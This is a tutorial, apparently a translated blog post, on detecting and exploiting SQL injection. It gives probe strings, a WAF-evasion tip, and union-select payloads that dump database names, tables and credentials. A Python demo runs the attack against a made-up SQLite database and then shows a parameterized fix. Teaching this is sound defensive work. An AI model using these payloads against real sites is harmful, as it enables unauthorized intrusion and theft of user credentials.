SQL injection: the most significant injection vulnerability

The essence of SQL injection

User-supplied data is executed as code.

Injection conditions

1. The user controls the input
2. The program splices that input into the SQL statement it then executes

Example:
http://www.xxx.com/new.php?id=1
http://www.xxx.com/new.php?id=2-1
If id=2-1 returns the same article as id=1, the database evaluated the expression, so the parameter is part of the query text.

The basic injection flow

1. Determine whether an injection point exists
1. The oldest method:

and 1=1    the page displays normally
and 1=2    the page does not display normally
Note: and 1=1 / and 1=2 is very likely to be intercepted by a WAF;
you can try and -1=-1 / and -1=-2 instead, or go straight to or sleep(5) and watch the response time

2. The simplest method:

Append a ' to the parameter and see whether the page throws an error

3. The common method:

If the parameter is numeric, try -1: no row has that id, so a changed page shows the value reached the query

2. Guess the number of columns

order by N    // N is the guessed column count; the largest N that still displays normally is the number of columns in the query (order by N+1 errors)

3. Use a union query to find the display positions

and 1=2 union select 1,2,3,......    // one placeholder per column; the numbers that show up on the page are the positions you can write data into

4. Enumerate databases, tables and fields

Check the current user:  union select 1,user(),3
Check the database:      union select 1,database(),3
Check the tables:        union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='database name'),3
Check the fields:        union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='database name' and table_name='table name'),3

5. Query the data we need

Dump the data: union select 1,(select group_concat(field1,field2) from databasename.tablename),3
Note: group_concat(field1,field2) joins the two values with nothing between them, so a separator such as 0x3a (a colon) is usually inserted: group_concat(field1,0x3a,field2)
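The whole flow above, as an added example that is not part of the original post: a Python script that reproduces the vulnerable new.php?id= query by splicing the parameter into the SQL text against an in-memory SQLite database, runs the detection probes (2-1, and 1=1 / and 1=2, the stray quote), finds the column count with order by, finds the display positions with union select placeholders, pulls out tables, fields and data with group_concat, and finally shows the same lookup written with a bound parameter so every probe stops working. Assumptions: the news and users tables and their rows are constructed for the demonstration; SQLite stands in for MySQL, so sqlite_master and pragma_table_info() replace information_schema.tables and information_schema.columns, and || replaces a MySQL separator such as 0x3a.

```python
import sqlite3


def make_db():
    """Constructed sample database standing in for the target site's backend.
    All values are made up; 'users' is the table the attacker is after."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news (id INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 'First post', 'hello'), (2, 'Second post', 'world');
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'P@ssw0rd'), (2, 'bob', 'hunter2');
    """)
    return con


def vulnerable_page(con, user_id):
    """new.php?id=<user_id> as the vulnerable page builds it: the parameter is
    spliced into the SQL text, so whatever the user sends becomes query code."""
    sql = "SELECT title, body FROM news WHERE id=" + user_id
    try:
        return {"ok": True, "rows": con.execute(sql).fetchall()}
    except sqlite3.Error as exc:
        return {"ok": False, "rows": [], "error": str(exc)}


def safe_page(con, user_id):
    """Hardened lookup: the numeric parameter is validated and then bound,
    so it is handed to the engine as a value, never parsed as SQL."""
    try:
        id_value = int(user_id)
    except ValueError:
        return {"ok": False, "rows": [], "error": "id must be an integer"}
    rows = con.execute("SELECT title, body FROM news WHERE id=?", (id_value,)).fetchall()
    return {"ok": True, "rows": rows}


def probe_arithmetic(con):
    """The post's own example: id=2-1 shows the same article as id=1 only if
    the database evaluated the expression."""
    return vulnerable_page(con, "2-1")["rows"] == vulnerable_page(con, "1")["rows"]


def probe_boolean(con):
    """Step 1, oldest method: a true condition leaves the page unchanged,
    a false one changes it."""
    base = vulnerable_page(con, "1")["rows"]
    return (vulnerable_page(con, "1 and 1=1")["rows"] == base
            and vulnerable_page(con, "1 and 1=2")["rows"] != base)


def probe_quote(con):
    """Step 1, simplest method: a stray quote breaks the statement."""
    return not vulnerable_page(con, "1'")["ok"]


def count_columns(con, max_cols=20):
    """Step 2: ORDER BY n is accepted while n <= number of selected columns."""
    for n in range(1, max_cols + 1):
        if not vulnerable_page(con, f"1 order by {n}")["ok"]:
            return n - 1
    return None


def visible_positions(con, ncols):
    """Step 3: make the original WHERE false and UNION in numbered placeholders;
    the numbers that reach the output are positions we can write into."""
    placeholders = ",".join(str(i) for i in range(1, ncols + 1))
    rows = vulnerable_page(con, f"1 and 1=2 union select {placeholders}")["rows"]
    return sorted({v for row in rows for v in row if isinstance(v, int)})


def extract(con, subquery, ncols, position):
    """Steps 4 and 5: place a scalar subquery in a visible position and read it back."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[position - 1] = f"({subquery})"
    rows = vulnerable_page(con, "1 and 1=2 union select " + ",".join(cols))["rows"]
    return rows[0][position - 1] if rows else None


def run_attack(con):
    """The full flow. sqlite_master and pragma_table_info() stand in for
    information_schema.tables / information_schema.columns (SQLite substitution)."""
    if not (probe_boolean(con) and probe_quote(con)):
        return None
    ncols = count_columns(con)
    pos = visible_positions(con, ncols)[0]
    return {
        "columns_in_query": ncols,
        "visible_position": pos,
        "tables": extract(con, "select group_concat(name) from sqlite_master where type='table'", ncols, pos),
        "user_columns": extract(con, "select group_concat(name) from pragma_table_info('users')", ncols, pos),
        "credentials": extract(con, "select group_concat(username || ':' || password) from users", ncols, pos),
    }


if __name__ == "__main__":
    db = make_db()
    print(run_attack(db))
    print(safe_page(db, "1 and 1=2"))
```

Running the script prints the enumerated table list, the users columns and the admin:password pairs from the vulnerable path, then the rejection returned by safe_page for the same payload; note that int() also rejects the 2-1 probe, so even the arithmetic check from the example above no longer reaches the database.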

Functions commonly used in injection:

GROUP_CONCAT(field1, field2)    // returns the values of one group concatenated into a single string
ASCII(char)                     // returns the ASCII code of the character (used in blind injection to guess one character at a time)
DATABASE()                      // returns the name of the current database
USER() or SYSTEM_USER()         // returns the user name and host of the current connection
VERSION()                       // returns the MySQL server version
SLEEP(n)                        // pauses for n seconds (used for time-based detection)


Source: www.cnblogs.com/yanlzy/p/11884291.html